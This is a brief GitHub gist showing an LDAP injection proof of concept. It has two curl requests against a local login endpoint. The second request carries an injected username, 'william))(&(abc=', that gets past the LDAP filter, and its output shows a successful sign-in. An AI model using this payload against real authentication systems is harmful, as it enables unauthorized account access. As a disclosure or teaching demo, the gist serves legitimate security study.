-
-
Save cdprf/24088c0ec21afe3ddeebbecb2e6eba27 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| § curl "william:password@localhost:9080/login" | |
| Login failed | |
| By exploiting the LDAP injection, we bypass the LDAP filter constraint and are successfully signed in: | |
| $ curl "william))(&(abc=:password@localhost:9080/login" | |
| WSPrincipal:uid=william,cn=users,dc=my-company,dc=com |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment